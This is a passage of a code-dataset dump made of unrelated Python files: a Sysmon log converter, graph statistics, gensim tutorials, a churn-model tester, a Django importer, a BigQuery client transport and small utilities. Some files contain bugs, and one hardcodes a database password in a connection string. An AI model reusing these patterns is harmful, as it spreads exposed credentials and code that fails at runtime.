open('./empire_apt3_2019-05-14223117.json','r') as sysmon:\n convertEvents(sysmon)","sub_path":"listings/sysmon-to-syslog.py","file_name":"sysmon-to-syslog.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"269815482","text":"import tool.util as util\nimport networkx as nx\nimport os\nimport copy\nfrom collections import Counter\n\nglobal keyword\ndef variance(l): # 平方-期望的平方的期望\n ex = float(sum(l)) / len(l)\n s = 0\n for i in l:\n s += (i - ex) ** 2\n return float(s) / len(l)\n\n\n# 计算边数存在率,g2是固定的大图\ndef cal_existed_edges_ratio(g1, g2, type):\n g1.remove_node(keyword)\n g2.remove_node(keyword)\n ngs = set(g1.nodes())\n ngs1 = set(g2.nodes())\n ngs2 = ngs & ngs1\n\n # 计算每个月的网络\n ngs = ngs - ngs2\n init_edge_num = len(g1.edges())\n for n in ngs:\n g1.remove_node(n)\n\n extra_node_edge = init_edge_num-len(g1.edges())\n\n # 计算总网络\n ngs1 = ngs1 - ngs2\n for n in ngs1:\n g2.remove_node(n)\n\n g3 = nx.difference(g1, g2)\n # 计算保留率\n r = 1-(len(g3.edges())+extra_node_edge) / init_edge_num\n print(r)\n return r\n\n# 计算最大k-core保留比例\ndef max_k_shell(g1, g2):\n g2 = nx.k_core(g2)\n g1 = nx.k_core(g1)\n\n s1 = set(g1.nodes())\n s2 = set(g2.nodes())\n s3 = s1 & s2\n\n print(str(len(s3)/len(s1)))\n print(str(len(s3)/len(s2)))\n return len(s3)/len(s1), len(s3)/len(s2)\n\n\n# 计算共同节点数在两个图之间的度分布\ndef same_node_degree(g1, g2):\n g2.remove_edges_from(g2.selfloop_edges())\n g1.remove_edges_from(g1.selfloop_edges())\n s1 = set(g1.nodes())\n s2 = set(g2.nodes())\n s3 = s2 - s1\n ns_list = []\n temp_list = []\n for node in s3:\n ns1 = g2.neighbors(node)\n cc = 0\n for n in ns1:\n if n in s1:\n cc += 1\n ns_list.append(cc)\n if cc == 5:\n temp_list.append(node)\n dd = nx.core_number(g2)\n tt_list = []\n for temp_word in temp_list:\n tt_list.append(dd[temp_word])\n if len(tt_list) > 0:\n print(len(tt_list),end=\"\\t\")\n print(sum(tt_list)/len(tt_list),end=\"\\t\")\n print(variance(tt_list))\n r_dict = Counter(ns_list)\n r_list = list(range(max(r_dict.keys())+1))\n for k,v in r_dict.items():\n r_list[k] = v\n return r_list\n\n\ndef calculate_existed_ratio(g1, g2, type):\n gg = nx.k_core(g1)\n 
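# nx.k_core(g1) with no k argument returns the maximal core of g1 (every node in it\n    # has at least k_max neighbours there), so the ratio computed below measures how much\n    # of g1's densest core also survives in g2.\n    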
s1 = set(gg.nodes())\n    s2 = set(g2.nodes())\n    s3 = s1 & s2\n    # return str(len(s1)) + \"\t\" + str(len(s3))\n    return str(len(s3)/len(s1))\n\n# Compute the retention ratio of the maximal common subgraph (MCS)\n# pkl_dir: directory containing the pkl files\n# mcs_dir: directory where the results are written\n# is_front: whether to compare with the preceding network\n# key_word: the keyword\n# lap: step size\ndef loop_compare(com_function, keyword_list, pkl_dir1, result_dir, mode=1, lap=1, type=\"pkl\"):\n    for key in keyword_list:\n        global keyword\n        keyword = key\n        print(key)\n        if mode == 0:\n            util.create_directory(result_dir + key + \"//\")\n        pkl_dir = pkl_dir1.format(key)\n        f_list = util.get_file_list(pkl_dir, '.pkl')\n        os.chdir(pkl_dir)\n        result_list = []\n        # sort in ascending order\n        nw_list = sorted(f_list)\n        ii = len(nw_list)-1\n\n        while ii - 2*lap >= 0:\n            g2 = util.get_nw(nw_list[ii])\n            # iteratively compose the subgraphs\n            # k = 1\n            # while k < lap:\n            #     g2 = nx.compose(g2, util.get_nw(nw_list[ii - k]))\n            #     k += 1\n\n            ii -= lap\n            g1 = util.get_nw(nw_list[ii])\n            # iteratively compose the subgraphs\n            # k = 1\n            # while k < lap:\n            #     g1 = nx.compose(g1, util.get_nw(nw_list[ii - k]))\n            #     k += 1\n\n            # build the connected subgraphs\n            # mutual ratios\n            if mode == 1:\n                r1, r2 = com_function(copy.deepcopy(g1), copy.deepcopy(g2))\n                result_list.append(nw_list[ii + lap][0:-4] + \"\t\" + str(r1))\n                result_list.append((nw_list[ii][0:-4] + \"\t\" + str(r2)))\n            # one-to-one\n            elif mode == 0:\n                result_list = com_function(copy.deepcopy(g1), copy.deepcopy(g2))\n                util.save_file(result_dir + key + \"//\" + nw_list[ii + lap][0:-4] + \".txt\", result_list)\n            # n-to-one\n            elif mode == 2:\n                r1 = com_function(copy.deepcopy(g1), copy.deepcopy(g2), type)\n                result_list.append(nw_list[ii + lap][0:-4] + \"\t\" + str(r1))\n\n            ii -= lap\n        if mode != 0:\n            result_list.reverse()\n            util.save_file(result_dir+key+\".txt\", result_list)\n\n\n\nkey_list = util.get_key_list()+util.get_key_list2()\npkl_dir = r\"D:\\semantic analysis\\新结果\\去虚词去单字\\合成共现网络\\{0}\\p//\"\n# pkl_dir = r\"D:\\semantic analysis\\新结果\\合并图\\{0}//\"\nresult_dir = r\"D:\\semantic analysis\\新结果\\去虚词去单字\\半年间边变化率//\"\n# result_dir = r\"D:\\semantic analysis\\新结果\\合并图\\扯淡//\"\nloop_compare(cal_existed_edges_ratio, key_list, pkl_dir, result_dir, 2, 5)\n# loop_compare(same_node_degree, key_list, pkl_dir, result_dir, 0)\n\n\n","sub_path":"calculate/graph/cal_core_mcs.py","file_name":"cal_core_mcs.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"336849147","text":"# Practice 4\n# Exercise 2: ask the user for 5 numbers and say whether they were in increasing order, decreasing order, or unordered.\n\nprint('Enter 5 numbers')\n# cast to float: comparing the raw input() strings would sort them lexicographically\nprimero = float(input())\nsegundo = float(input())\ntercero = float(input())\ncuarto = float(input())\nquinto = float(input())\nif primero <= segundo <= tercero <= cuarto <= quinto:\n    print('The numbers are in increasing order')\nelif quinto <= cuarto <= tercero <= segundo <= primero:\n    print('The numbers are in decreasing order')\nelse:\n    print('The numbers are unordered')\n","sub_path":"Python/Practica4/Practica4ej2.py","file_name":"Practica4ej2.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"243183913","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\nimport BScode\nimport LFcode\nimport animate\nimport plot\n\n#####\n#\n# The Initial Conditions\n#\n#####\n\n# General\nalpha = 0.02\nL = 20\nh_div = 200\ndx = L/h_div\ndt = dx/10\n\n# Lax-Friedrichs Model\ncenter = 5\nkpeak = 1.35  # 3.5\neta0 = [np.exp(-.5*(x-center)**2)+1 for x in 
np.arange(0,L,dx)]\nk0 = [kpeak*np.exp(-.5*(x-center)**2)+1 for x in np.arange(0,L,dx)]\n\n#Verlet\nkmin = 2.4 #2.5\nkmax = 100 # 10 (doesn't mean anything for getk_d)\ndk = kmin*1\ng = 0\nm = 1\ngamma = 0.1 #0.1\na0 = (L/h_div)/5\n\nLFsteps = 100\nBSsteps = 300 #1000\n\n\n#####\n#\n# The Code\n#\n#####\n\neta,xyeta,v,xyv = LFcode.doLF(alpha,L,dx,dt,LFsteps,eta0,k0,True)\n\nin_x0 = xyeta[LFsteps-1]\nin_xm1 = xyeta[LFsteps-2]\n\nin_v0 = v[LFsteps-1]\nx0 = BScode.data_to_pairs(in_x0)\nxm1 = BScode.data_to_pairs(in_xm1)\nv0 = np.array([[v,0] for v in in_v0])\n\n\n\nBSdt= dt*2\n\nspring_data,energy = BScode.verlet(x0,xm1,v0,BScode.acceleration,a0,m,kmin,kmax,dk,alpha,gamma,dt,BSdt,BSsteps,False)\n\n#Format the verlet data to the lax-friedrichs format\ndata_fmt = []\nfor t in spring_data:\n xout = []\n yout = []\n for d in t:\n xout.append(d[0])\n yout.append(d[1])\n data_fmt.append([xout,yout])\n\n\"\"\"\n\nx = [2.53240, 1.91110, 1.18430, 0.95784, 0.33158,\n -0.19506, -0.82144, -1.64770, -1.87450, -2.2010]\n\ny = [-2.50400, -1.62600, -1.17600, -0.87400, -0.64900,\n -0.477000, -0.33400, -0.20600, -0.10100, -0.00600]\n\ncoefficients = polyfit(x, y, 6)\npolynomial = poly1d(coefficients)\nxs = arange(-2.2, 2.6, 0.1)\nys = polynomial(xs)\n\nplot(x, y, 'o')\nplot(xs, ys)\nylabel('y')\nxlabel('x')\nshow()\n\"\"\"\n\n#combine the data\nfull_data = []\nfor time in xyeta:\n x = []\n for pos in time[0]:\n x.append(pos)\n y = []\n for pos in time[1]:\n y.append(pos)\n full_data.append([x,y])\n\nfor time in data_fmt:\n x = []\n for pos in time[0]:\n x.append(pos)\n y = []\n for pos in time[1]:\n y.append(pos)\n full_data.append([x,y])\n\n\"\"\"\nfor t in full_data:\n y = t[1]\n print(max(y))\n\"\"\"\nbreak_dat = full_data[250]\npeak_h = max(break_dat[1])\ni = 0\nwhile i < len(break_dat[1]):\n if break_dat[1][i] == peak_h:\n print(i)\n peak_i = i\n i += 1\nprint(break_dat[0][peak_i],break_dat[1][peak_i])\n\n#####\n#\n# The Animation\n#\n#####\nvideo_length = 7\nanimate.animate(alpha,L,dx,dt,full_data,video_length,True)\n\nshow_frame = False\n\n#print(np.array(data))\n\nif show_frame:\n # Max of 4 frames (for more add colors and linestyles)\n print(\"Loading Image...\")\n frames = [250,275,300]\n #xvals = [i for [i,j] in indata]\n #yvals = [j for [i,j] in indata]\n #scatter(xvals,yvals,'$x$','$h$',None,False)\n i = 0\n out = []\n while i < len(frames):\n index = frames[i]\n d = full_data[index]\n xs = []\n ys = []\n out.append(d)\n \"\"\"\n for [x,y] in d:\n xs.append(x)\n ys.append(y)\n out.append(np.array([np.array(xs),np.array(ys)]))\n \"\"\"\n i += 1\n plot.plot_frame(out,None,alpha,L,xlabel='$q$',ylabel='$\\eta$',title='')","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"590106028","text":"# 1.Creating and querying a corpus with gensim\r\n# Sample Data\r\narticles = [['uses',\r\n 'file',\r\n 'operating',\r\n 'system',\r\n 'placement',\r\n 'software',\r\n '.svg|thumb|upright|a',\r\n 'diagram']]\r\n\r\n# Import Dictionary\r\nfrom gensim.corpora.dictionary import Dictionary\r\n\r\n# Create a Dictionary from the articles: dictionary\r\ndictionary = Dictionary(articles)\r\n\r\n# Select the id for \"file\": computer_id\r\nfile_id = dictionary.token2id.get(\"file\")\r\n\r\n# Use computer_id with the dictionary to print the word\r\nprint(dictionary.get(file_id))\r\n\r\n# Create a MmCorpus: corpus\r\ncorpus = [dictionary.doc2bow(article) for article in articles]\r\n\r\n# 
Print the first 10 word ids with their frequency counts from the first document\r\nprint(corpus[0][:10])\r\n\r\n# 2. Gensim bag-of-words\r\n# Save the first document: doc\r\ndoc = corpus[0]\r\n\r\n# Sort the doc for frequency: bow_doc\r\nbow_doc = sorted(doc, key=lambda w: w[1], reverse=True)\r\n\r\n# Print the top 5 words of the document alongside the count\r\nfor word_id, word_count in bow_doc[:5]:\r\n    print(dictionary.get(word_id), word_count)\r\n\r\n# Imports needed by the word-count section below\r\nfrom collections import defaultdict\r\nimport itertools\r\n\r\n# Create the defaultdict: total_word_count\r\ntotal_word_count = defaultdict(int)\r\nfor word_id, word_count in itertools.chain.from_iterable(corpus):\r\n    total_word_count[word_id] += word_count\r\n\r\n# Create a sorted list from the defaultdict: sorted_word_count\r\nsorted_word_count = sorted(total_word_count.items(), key=lambda w: w[1], reverse=True)\r\n\r\n# Print the top 5 words across all documents alongside the count\r\nfor word_id, word_count in sorted_word_count[:5]:\r\n    print(dictionary.get(word_id), word_count)\r\n\r\n# 3. Tf-idf with Wikipedia\r\n\r\n# Notes:\r\n# Formula: w = tf * log(N/df)\r\n# w - tf-idf weight for token i in document j\r\n# tf - number of occurrences of token i in document j\r\n# df - number of documents that contain token i\r\n# N - total number of documents\r\n\r\n# Example: You want to calculate the tf-idf weight for the word \"computer\", which appears five times in a document containing 100 words. Given a corpus containing 200 documents, with 20 documents mentioning the word \"computer\", tf-idf can be calculated by multiplying term frequency with inverse document frequency.\r\n# Formula: w = (5 / 100) * log(200 / 20)\r\n\r\n# Import TfidfModel\r\nfrom gensim.models.tfidfmodel import TfidfModel\r\n\r\n# Create a new TfidfModel using the corpus: tfidf\r\ntfidf = TfidfModel(corpus)\r\n\r\n# Calculate the tfidf weights of doc: tfidf_weights\r\ntfidf_weights = tfidf[doc]\r\n\r\n# Print the first five weights\r\nprint(tfidf_weights[:5])\r\n\r\n# Sort the weights from highest to lowest: sorted_tfidf_weights\r\nsorted_tfidf_weights = sorted(tfidf_weights, key=lambda w: w[1], reverse=True)\r\n\r\n# Print the top 5 weighted words\r\nfor term_id, weight in sorted_tfidf_weights[:5]:\r\n    print(dictionary.get(term_id), weight)\r\n\r\n\r\n","sub_path":"Natural Language Processing Fundamentals in Python/2_2_Introduction_to_gensim.py","file_name":"2_2_Introduction_to_gensim.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"189481413","text":"import os\r\nimport requests\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport sqlalchemy\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score\r\nfrom sklearn.model_selection import cross_val_predict\r\nfrom imblearn.combine import SMOTETomek\r\nimport json\r\n\r\nclass testing():\r\n    def __init__(self, original_data, webappdata):\r\n        self.availdata = original_data\r\n        self.webappdata = webappdata\r\n    def get_data(self):\r\n        # data from MySQL Database\r\n        #https://dev.to/fpim/object-oriented-design-architecture-with-panda-me4 ### Reference for data cleaning and making perfect data\r\n\r\n        ### Open a connection to the database\r\n        engine = sqlalchemy.create_engine('mysql+pymysql://root:idntknwpassword#404@localhost:3306/churnapp')\r\n        avail_df = pd.read_sql_table(self.availdata, engine)\r\n        app_df = pd.read_sql_table(self.webappdata, engine)\r\n\r\n        raw_data = pd.concat([avail_df, app_df], axis=0)\r\n\r\n        return raw_data\r\n\r\n    def preprocess_input(self):\r\n\r\n        # get_data() already returns a DataFrame, so use it directly (pd.read_csv expects a path)\r\n        df = self.get_data()\r\n\r\n        all_features = df.columns\r\n\r\n        ### Cast TotalCharges to a numeric value\r\n        df['TotalCharges'] = pd.to_numeric(df['TotalCharges'], downcast='integer', errors='coerce')\r\n\r\n        ### Log-transform the numeric columns, since the data is skewed\r\n        numerical_feature = [feature for feature in df.columns if df[feature].dtypes!=\"O\"]\r\n        numerical_feature.remove('SeniorCitizen')\r\n        for feature in numerical_feature:\r\n            df[feature] = np.log(df[feature])\r\n\r\n        ### Picking up the categorical variables (list concatenation, not string addition)\r\n        categorical_features = [feature for feature in all_features if feature not in numerical_feature + ['customerID', 'Churn']]\r\n\r\n        ### Handling rare categorical variables\r\n        # TotalCharges is numeric after the cast above, so drop it only if it slipped in\r\n        if \"TotalCharges\" in categorical_features:\r\n            categorical_features.remove(\"TotalCharges\")\r\n        for feature in categorical_features:\r\n            data = df.copy()\r\n            data[\"Churn\"] = np.where((data[\"Churn\"]==\"Yes\"),1,0)\r\n            temp = df.groupby(feature)[\"Churn\"].count()/len(data) # Collecting the total values\r\n            temp_df = temp[temp>0.01].index # Categories covering more than 1% of rows are kept\r\n            df[feature] = np.where(df[feature].isin(temp_df), df[feature], \"Rare_var\") # Replacing rare categories\r\n\r\n        ### Transforming the categorical variables into labels\r\n        # Label encoding is fine here since there is no high cardinality\r\n        categorical_features.append(\"Churn\")\r\n        data = df[categorical_features]\r\n        df.drop(categorical_features, axis=1, inplace=True) # Dropping categorical variables\r\n        data = data.apply(LabelEncoder().fit_transform) # Transforming the characters to labels\r\n\r\n        ### Concatenating the whole dataset into a single frame\r\n        df = pd.concat([df,data], axis=1)\r\n\r\n        ### Scaling the values\r\n        scaling_feature = [feature for feature in all_features if feature not in [\"customerID\", \"Churn\"]]\r\n\r\n        # The log transform above can produce infinite values (e.g. log(0) in tenure)\r\n        df.replace([np.inf, -np.inf], 0, inplace=True) # Replacing inf values with 0\r\n\r\n        ### Fitting the values to the scaler\r\n        scaler=MinMaxScaler()\r\n        scaler.fit(df[scaling_feature])\r\n        df = pd.concat([df[[\"customerID\", \"Churn\"]].reset_index(drop=True),\r\n                        pd.DataFrame(scaler.transform(df[scaling_feature]), columns=scaling_feature)],\r\n                       axis=1)\r\n        ### Rearranging the columns to match the original dataset order\r\n        df = df[[feature for feature in all_features]]\r\n\r\n        return df\r\n\r\n    def data_testing(self):\r\n\r\n        # preprocess_input() returns a DataFrame, so no pd.read_csv round-trip is needed\r\n        df = self.preprocess_input()\r\n\r\n        # Taking only the selected features\r\n        selected_features = [\"Contract\", \"OnlineSecurity\", \"TechSupport\", \"tenure\", \"MonthlyCharges\", \"SeniorCitizen\", \"Dependents\", \"Churn\"]\r\n        df = df[selected_features]\r\n\r\n        # Dependent and independent variables split up\r\n        X = df.drop(\"Churn\", axis=1)\r\n        Y = df[\"Churn\"]\r\n\r\n        # RandomForestClassifier model\r\n        clf = RandomForestClassifier()\r\n        yhat = cross_val_predict(clf, X, Y, cv=5)\r\n\r\n        acc = np.mean(yhat == Y)\r\n        tn, fp, fn, tp = confusion_matrix(Y, yhat).ravel()\r\n        specificity = tn / (tn+fp)\r\n        sensitivity = tp / (tp + fn)\r\n\r\n        # Let's visualize within several slices of the dataset\r\n        score = yhat == Y\r\n        score_int = [int(s) for s in score]\r\n        df['pred_accuracy'] = score_int\r\n\r\n        # Bar plot by region\r\n\r\n        sns.set_color_codes(\"dark\")\r\n
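        # NOTE: the per-region plot below assumes the processed frame still carries a\r\n        # 'region' column; 'region' is not in selected_features above, so treat this\r\n        # visualization as a sketch of the intended per-slice accuracy breakdown.\r\n        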
ax = sns.barplot(x=\"region\", y=\"pred_accuracy\", data=df, palette = \"Greens_d\")\r\n ax.set(xlabel=\"Region\", ylabel = \"Model accuracy\")\r\n figure = plt.savefig(\"by_region.png\",dpi=80)\r\n\r\n # Now print to file\r\n with open(\"metrics.json\", 'w') as outfile:\r\n json.dump({ \"accuracy\": acc, \"specificity\": specificity, \"sensitivity\":sensitivity}, outfile)\r\n\r\n return outfile, figure\r\n\r\n \r\n\r\n\r\n","sub_path":"pytesting.py","file_name":"pytesting.py","file_ext":"py","file_size_in_byte":5558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"554948846","text":"import csv\n\nfrom django.core.management.base import BaseCommand\n\nfrom categories.models import Category\nfrom channels.models import Channel\n\n\nclass Command(BaseCommand):\n help = 'Import categories from csv file from given channel'\n\n def add_arguments(self, parser):\n parser.add_argument('channel', help='Channel name')\n parser.add_argument('file', help='CSV file with categories tree')\n\n def handle(self, *args, **options):\n channel, created = Channel.objects.get_or_create(name=options['channel'])\n count = 0\n\n if created is False:\n self.stdout.write(f'\\nDeleting categories from {channel.name}.\\n\\n')\n Category.objects.filter(channel=channel).delete()\n\n with open(options['file']) as file:\n csv_file = csv.reader(file)\n\n for row in csv_file:\n categories_list = row[0].split(' / ')\n count += Category.import_categories(channel, categories_list)\n\n self.stdout.write(f'\\n{count} categories processed!')\n","sub_path":"work-at-olist/core/management/commands/import_categories.py","file_name":"import_categories.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"156851028","text":"import json\nimport os\nimport glob\n\njson_files_path = glob.glob(os.path.join(\"C:\", os.sep, \"output\", \"game\", \"info\", \"*.json\"))\n# output_csv_file_path = os.path.join(\"C:\", os.sep, \"output\", \"edit\", \"info\", \"20mins_or_less.csv\")\noutput_csv_file_path = os.path.join(\"C:\", os.sep, \"output\", \"edit\", \"info\", \"more_then_20mins.csv\")\n\n# しばらく決め打ち\nSMITE_SPELL_ID = 11\nSOLO_DUO_Q = 420\nTWENTY_MINUTE_SECONDS = 1200\n\nwith open(output_csv_file_path, 'w') as csv_f:\n\n tmp = \"\"\n for i in range(5):\n tmp += \",championId{0},role{0},lane{0},haveSmite{0}\".format(i)\n\n # 項目名の出力\n csv_f.write(tmp[1:])\n csv_f.write(\"\\n\")\n\n # 1試合づつ読み込み\n for json_file_path in json_files_path:\n game_id, ext = os.path.splitext(os.path.basename(json_file_path))\n\n with open(json_file_path, 'r') as f:\n json_data = json.load(f)\n\n # ランク戦のみ取り込んでいるはずが、チュートリアルのデータも入ってる\n # 不要なので、読み飛ばす\n if json_data['queueId'] != SOLO_DUO_Q:\n # print(\"{0} is skipped\".format(game_id))\n continue\n\n # 試合時間20分以下のデータは扱わない\n if json_data['gameDuration'] <= TWENTY_MINUTE_SECONDS:\n\n # 試合時間20分超のデータは扱わない\n # if json_data['gameDuration'] > TWENTY_MINUTE_SECONDS:\n continue\n\n print(game_id, json_data['gameDuration'])\n\n participants = json_data['participants']\n\n participants_of_match = {}\n cnt = 0\n\n for participant in participants:\n # print(participant[\"participantId\"])\n # tmp_participant = OrderedDict()\n\n tmp_participant = {}\n\n tmp_participant['participantId'] = participant[\"participantId\"]\n tmp_participant['championId'] = participant[\"championId\"]\n tmp_participant['role'] = participant[\"timeline\"][\"role\"]\n tmp_participant['lane'] = 
participant[\"timeline\"][\"lane\"]\n\n if participant[\"spell1Id\"] == SMITE_SPELL_ID or participant[\"spell2Id\"] == SMITE_SPELL_ID:\n tmp_participant[\"smite\"] = 1\n\n else:\n tmp_participant[\"smite\"] = 0\n\n participants_of_match[participant[\"participantId\"]] = tmp_participant\n\n tmp = \"\"\n for i in range(0, 2):\n # print(i)\n\n # 1-5, 6-10と1チーム5人ずつ設定し、出力する\n for x in range(i * 5 + 1, i * 5 + 6):\n tmp += ',{championId},{role},{lane},{smite},{support_item}'.format(championId=participants_of_match[x][\"championId\"],\n role=participants_of_match[x][\"role\"],\n lane=participants_of_match[x][\"lane\"],\n smite=participants_of_match[x][\"smite\"])\n # 異常ケースを含むチームがあるかどうかのざっくり目視確認\n # print(tmp)\n\n csv_f.write(tmp[1:])\n csv_f.write(\"\\n\")\n tmp = \"\"\n\nprint(\"ended\")\n","sub_path":"python/identifyRoles/data_wrangling/automatic_detected_role/preprocessing/not_used/outputMatchesInfoCsv.py","file_name":"outputMatchesInfoCsv.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"119800441","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport abc\nimport typing\n\nfrom google import auth\nfrom google.auth import credentials # type: ignore\n\nfrom google.cloud.bigquery.reservation_v1.types import reservation\nfrom google.cloud.bigquery.reservation_v1.types import reservation as gcbr_reservation\nfrom google.protobuf import empty_pb2 as empty # type: ignore\n\n\nclass ReservationServiceTransport(metaclass=abc.ABCMeta):\n \"\"\"Abstract transport class for ReservationService.\"\"\"\n\n AUTH_SCOPES = (\n \"https://www.googleapis.com/auth/bigquery\",\n \"https://www.googleapis.com/auth/cloud-platform\",\n )\n\n def __init__(\n self,\n *,\n host: str = \"bigqueryreservation.googleapis.com\",\n credentials: credentials.Credentials = None,\n ) -> None:\n \"\"\"Instantiate the transport.\n\n Args:\n host (Optional[str]): The hostname to connect to.\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n \"\"\"\n # Save the hostname. 
Default to port 443 (HTTPS) if none is specified.\n if \":\" not in host:\n host += \":443\"\n self._host = host\n\n # If no credentials are provided, then determine the appropriate\n # defaults.\n if credentials is None:\n credentials, _ = auth.default(scopes=self.AUTH_SCOPES)\n\n # Save the credentials.\n self._credentials = credentials\n\n @property\n def create_reservation(\n self\n ) -> typing.Callable[\n [gcbr_reservation.CreateReservationRequest], gcbr_reservation.Reservation\n ]:\n raise NotImplementedError\n\n @property\n def list_reservations(\n self\n ) -> typing.Callable[\n [reservation.ListReservationsRequest], reservation.ListReservationsResponse\n ]:\n raise NotImplementedError\n\n @property\n def get_reservation(\n self\n ) -> typing.Callable[[reservation.GetReservationRequest], reservation.Reservation]:\n raise NotImplementedError\n\n @property\n def delete_reservation(\n self\n ) -> typing.Callable[[reservation.DeleteReservationRequest], empty.Empty]:\n raise NotImplementedError\n\n @property\n def update_reservation(\n self\n ) -> typing.Callable[\n [gcbr_reservation.UpdateReservationRequest], gcbr_reservation.Reservation\n ]:\n raise NotImplementedError\n\n @property\n def create_capacity_commitment(\n self\n ) -> typing.Callable[\n [reservation.CreateCapacityCommitmentRequest], reservation.CapacityCommitment\n ]:\n raise NotImplementedError\n\n @property\n def list_capacity_commitments(\n self\n ) -> typing.Callable[\n [reservation.ListCapacityCommitmentsRequest],\n reservation.ListCapacityCommitmentsResponse,\n ]:\n raise NotImplementedError\n\n @property\n def get_capacity_commitment(\n self\n ) -> typing.Callable[\n [reservation.GetCapacityCommitmentRequest], reservation.CapacityCommitment\n ]:\n raise NotImplementedError\n\n @property\n def delete_capacity_commitment(\n self\n ) -> typing.Callable[[reservation.DeleteCapacityCommitmentRequest], empty.Empty]:\n raise NotImplementedError\n\n @property\n def update_capacity_commitment(\n self\n ) -> typing.Callable[\n [reservation.UpdateCapacityCommitmentRequest], reservation.CapacityCommitment\n ]:\n raise NotImplementedError\n\n @property\n def split_capacity_commitment(\n self\n ) -> typing.Callable[\n [reservation.SplitCapacityCommitmentRequest],\n reservation.SplitCapacityCommitmentResponse,\n ]:\n raise NotImplementedError\n\n @property\n def merge_capacity_commitments(\n self\n ) -> typing.Callable[\n [reservation.MergeCapacityCommitmentsRequest], reservation.CapacityCommitment\n ]:\n raise NotImplementedError\n\n @property\n def create_assignment(\n self\n ) -> typing.Callable[[reservation.CreateAssignmentRequest], reservation.Assignment]:\n raise NotImplementedError\n\n @property\n def list_assignments(\n self\n ) -> typing.Callable[\n [reservation.ListAssignmentsRequest], reservation.ListAssignmentsResponse\n ]:\n raise NotImplementedError\n\n @property\n def delete_assignment(\n self\n ) -> typing.Callable[[reservation.DeleteAssignmentRequest], empty.Empty]:\n raise NotImplementedError\n\n @property\n def search_assignments(\n self\n ) -> typing.Callable[\n [reservation.SearchAssignmentsRequest], reservation.SearchAssignmentsResponse\n ]:\n raise NotImplementedError\n\n @property\n def move_assignment(\n self\n ) -> typing.Callable[[reservation.MoveAssignmentRequest], reservation.Assignment]:\n raise NotImplementedError\n\n @property\n def get_bi_reservation(\n self\n ) -> typing.Callable[\n [reservation.GetBiReservationRequest], reservation.BiReservation\n ]:\n raise NotImplementedError\n\n @property\n def 
update_bi_reservation(\n self\n ) -> typing.Callable[\n [reservation.UpdateBiReservationRequest], reservation.BiReservation\n ]:\n raise NotImplementedError\n\n\n__all__ = (\"ReservationServiceTransport\",)\n","sub_path":"google/cloud/bigquery/reservation_v1/services/reservation_service/transports/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"381696271","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport csv\n\nfrom os.path import join\nfrom .word import Word\n\n\ndef print_and_get_file_list(path, verbose=True):\n \"\"\"\n Print all files in target path\n :param path: target path\n :param verbose: if true, print file list\n :return: file list\n \"\"\"\n file_list = list()\n\n idx = 1\n for root_path, dirs, files in os.walk(path):\n depth = root_path.replace(path, '').count(os.sep)\n indent = ' ' * 1 * depth\n if verbose:\n print('%s%s/' % (indent, root_path))\n child_indent = ' ' * 1 * (depth + 1)\n for f in files:\n if verbose:\n print('%s- %d. %s' % (child_indent, idx, f))\n file_list.append(join(root_path, f))\n idx += 1\n\n return file_list\n\n\ndef read_csv(file):\n \"\"\"\n Read word file csv, and store it into a list\n :param file: target word file\n :return: word list\n \"\"\"\n file = open(file, 'r', encoding='utf-8')\n word_list = []\n reader = csv.reader(file)\n for line in reader:\n word_param = {}\n try:\n word_param['word'] = line[0]\n except IndexError:\n word_param['word'] = ''\n\n try:\n word_param['e_mean'] = line[1]\n except IndexError:\n word_param['e_mean'] = ''\n\n try:\n word_param['k_mean'] = line[2]\n except IndexError:\n word_param['k_mean'] = ''\n\n try:\n word_param['sentence'] = line[3]\n except IndexError:\n word_param['sentence'] = ''\n word_list.append(Word(word=word_param['word'],\n e_mean=word_param['e_mean'],\n k_mean=word_param['k_mean'],\n sentence=word_param['sentence']))\n file.close()\n return word_list\n","sub_path":"tb_voca/word_io.py","file_name":"word_io.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"635242917","text":"__author__ = 'ksharma'\n\nimport urllib2\nimport json\nimport time\nimport sys\nimport signal\nimport datetime\n\n\ndef signal_handler(signal, frame):\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\ndef main():\n # try:\n while True:\n response = 